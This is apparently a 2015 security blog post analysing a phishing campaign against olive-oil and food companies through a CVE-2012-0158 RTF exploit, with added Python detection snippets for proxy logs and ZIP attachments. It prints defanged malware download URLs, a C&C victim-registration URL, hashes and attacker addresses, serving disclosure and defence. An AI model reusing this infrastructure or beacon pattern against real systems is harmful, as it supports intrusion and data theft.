The great Olive Oil hack

Kevin Beaumont
Feb 25, 2015 · 4 min read


On Tuesday 24th February 2015, an employee at a food company who handles olive oil received an email about olive oil:

The email was sent from Microsoft Hotmail, neski.tarlon-neski@hotmail.com. It contains references to Tarlon Neski, and Foodiegroup.net (a food company). Because the email was sent via Microsoft’s cloud infrastructure, it is likely to bypass spam filtering.

It’s actually part of an attempt to break into the networks of food manufacturing groups.

The attachment, scan3.zip, contained a Word document called scan3.doc. Unzipped, it is 6.62 MB. The VirusTotal report is here (note that detection rates have improved dramatically since the document was distributed to vendors).

The Word document was actually an RTF document containing an exploit for CVE-2012-0158. The exploit is, obviously, many years old — but many companies simply do not patch, or do not have the resources to patch.

The document causes Word 2010 to crash:

At that point the payload is silently delivered, and from then on nothing looks wrong to the user.

The attackers appear to inspect the PC, then deliver three executables:

alitalia.exe — VirusTotal: 07c87ae27e3ff293a33b77d5c4130813074c17362e3ae7561f572ed79dc08ab1

ggrhrhrh.exe — VirusTotal: 3ad42d527ed36160a80d57c9619b3b0f55fd20cc23c08637f732846cd8aa0c20

slut.exe — VirusTotal: b3ac56ebf9a8ccb240208e2f5d8ea903aedd6e001845432fc980a04da8e42bda

When these were submitted to VirusTotal, no vendor detected them. I have since distributed these to antivirus providers.

These executables are renamed, and various other malicious actions take place.

It appears to be a combination of Betabot/Neurevt, ISR Stealer and assorted extras.

Downloads are made via:

hxxp://198.50.199.227/hatenot/Panel/order.php?id=5055507
hxxp://artphotolab.ru/wp-content/plugins/documents/upload/adobe/ (IP address 178.170.164.215)

A request is then made to register the PC with the command and control (C&C) server, which acts as an asset database of infected machines:

hxxp://hjfgfhejdhfg.netau.net/a/index.php?action=add&username=&password=&app=&pcname=<MACHINE_NAME>&sitename= (IP address 31.170.160.129)
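The registration request above has a very recognisable shape (action=add with empty username/password/app fields and a pcname value), which is easy to hunt for in web proxy logs. The following is an added example, not code from the original post: it scans a few constructed proxy log lines for the C&C hosts named here and for that beacon shape (the log format and the machine name FIN-WS-017 are assumptions).

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample proxy log lines (format assumed: "<timestamp> <client_ip> <method> <url> <status>")
SAMPLE_LOG = """\
2015-02-24T10:01:12Z 10.0.5.23 GET http://hjfgfhejdhfg.netau.net/a/index.php?action=add&username=&password=&app=&pcname=FIN-WS-017&sitename= 200
2015-02-24T10:01:15Z 10.0.5.23 GET http://198.50.199.227/hatenot/Panel/order.php?id=5055507 200
2015-02-24T10:02:40Z 10.0.5.40 GET http://intranet.example/index.php?action=add&item=42 200
2015-02-24T10:03:01Z 10.0.5.41 GET http://www.example.org/news.html 200
"""

# Query parameters the victim registration beacon carries (taken from the URL in the post)
BEACON_PARAMS = {"action", "username", "password", "app", "pcname", "sitename"}
# Infrastructure named in the post; hostnames are compared lower-case
KNOWN_C2 = {"hjfgfhejdhfg.netau.net", "198.50.199.227", "artphotolab.ru"}


def classify(url):
    """Return the reasons (possibly none) why this URL looks like the campaign's C&C traffic."""
    parsed = urlparse(url)
    reasons = []
    if parsed.hostname in KNOWN_C2:
        reasons.append("known C&C host")
    # keep_blank_values=True matters: the beacon sends username=&password=&app= as empty fields
    query = parse_qs(parsed.query, keep_blank_values=True)
    if BEACON_PARAMS <= set(query) and query.get("action") == ["add"]:
        reasons.append("registration beacon shape: pcname=%s" % query["pcname"][0])
    return reasons


def scan(log_text):
    """Return (client_ip, url, reasons) for every log line that matches."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue                      # skip malformed lines rather than crash
        _timestamp, client, _method, url = fields[:4]
        reasons = classify(url)
        if reasons:
            hits.append((client, url, reasons))
    return hits


if __name__ == "__main__":
    for client, url, reasons in scan(SAMPLE_LOG):
        print(client, "->", url, "|", "; ".join(reasons))
```

An unrelated internal URL with action=add but without the full parameter set is not flagged, which keeps the rule from firing on ordinary web applications.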

This database is big: they are targeting food companies, and in particular the malicious actor(s) have a very large list of employees who work with olive oil. Judging by typos carried over from the public addresses, this list may have been built from documents on the International Olive Oil Council website, among others.

One of the executables contains an email address, vladirputs@mail.com, which is used to deliver keylogs, RDP session details, and screenshots.

By further research we were able to find an actor in the attack — maylukin001@gmail.com

It is unknown why they are targeting food production companies.

One thing to be very careful of — it is clear from the C&C server that a significant number of food companies were impacted — some small, some very large — and those end user machines generally had antivirus software and were sitting behind the corporate firewall. I strongly recommend food companies beef up their security beyond installing legacy endpoint antivirus solutions — once your internal PCs are reachable by external malicious actors, your firewall is useless and your security is compromised.

To give an example, the attack infrastructure stores screenshots of the PCs they were in the middle of hacking:

The malicious actors in this attack appear to be silently hacking the systems and placing them into the asset database. What they plan to do with them is unknown, but by keylogging access to internal systems they may aim to move further inside the networks of those impacted.

Recommended preventative actions

  • Place RTF files in Protected View in Office, using Group Policy.
  • Turn on ActiveX control filtering in Office, using Group Policy (or just disable ActiveX in Office).
  • Trustwave Secure Email Gateway correctly flags this attachment as an exploit attempt, and fails to deliver it to the user. Find an email filtering solution which extracts ZIP files and inspects Office documents, to make sure they are a valid Office format.
  • Place users behind a proxy or firewall which can control downloads, and then do not allow random employees to download executables. Whitelist executable download sites instead. 99% of your employees don't need to download a file called slut.exe from a Russian website, yet most corporations still allow this. Pro-tip: don’t. If users kick off they can’t install iTunes to listen to Justin Bieber, tell them to do some work instead. They might just benefit your company instead.
  • Microsoft EMET (free) stops the exploit, as does Palo Alto Traps and Malwarebytes Anti-Exploit — even if you have not applied the security patch. If you do not have time to do regular security updates, you could reinvest some time in deploying an anti-exploit system. These also provide good coverage of security exploits where no patch exists.
  • Consider using Microsoft AppLocker — included in Enterprise and Ultimate editions of Windows — to restrict executables running from the AppData folder. Slut.exe does not need to run from your user temp folders. This stops most forms of malware dead.
  • Palo Alto Traps had generic detection of the exploit payload method since February 5th — 17 days before food companies were targeted. However, it is not free (or particularly cheap).
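The third recommendation above (extract ZIP attachments and check that an "Office document" really is one) is the check that would have caught scan3.doc, which carries a .doc name but RTF content. The following is an added example and not the post's or any product's code: it unpacks a constructed stand-in for scan3.zip and compares each member's magic bytes against what its extension claims (the file list inside the sample archive is made up).

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls/.ppt compound document
OOXML_MAGIC = b"PK\x03\x04"                       # .docx/.xlsx/.pptx are ZIP containers
RTF_MAGIC = b"{\\rtf"                             # what scan3.doc actually started with

# Expected leading bytes for each claimed Office extension
OFFICE_EXT = {".doc": OLE_MAGIC, ".xls": OLE_MAGIC, ".ppt": OLE_MAGIC,
              ".docx": OOXML_MAGIC, ".xlsx": OOXML_MAGIC, ".pptx": OOXML_MAGIC,
              ".rtf": RTF_MAGIC}
EXEC_EXT = {".exe", ".scr", ".com", ".js", ".vbs"}


def inspect_member(name, head):
    """Return None if the member matches its extension, otherwise a reason string."""
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    if ext in EXEC_EXT:
        return "%s: executable attachment" % name
    if ext not in OFFICE_EXT:
        return None                                   # not an Office type; out of scope here
    if head.startswith(OFFICE_EXT[ext]):
        return None                                   # content agrees with the extension
    if head.startswith(RTF_MAGIC):
        return "%s is actually RTF (possible RTF exploit document)" % name
    return "%s does not match its claimed Office format" % name


def inspect_zip(blob):
    """Inspect every file inside a ZIP attachment; an empty list means nothing suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            head = zf.open(info).read(16)             # only the leading bytes are needed
            reason = inspect_member(info.filename, head)
            if reason:
                findings.append(reason)
    return findings


def build_sample():
    """Constructed stand-in for scan3.zip: 'scan3.doc' is RTF text, 'notes.doc' is a real OLE header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("scan3.doc", b"{\\rtf1\\ansi placeholder body, not the real document}")
        zf.writestr("notes.doc", OLE_MAGIC + b"\x00" * 8)
    return buf.getvalue()
```

A gateway that applies this check rejects the attachment on the format mismatch alone, without needing a signature for the specific exploit inside the RTF.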
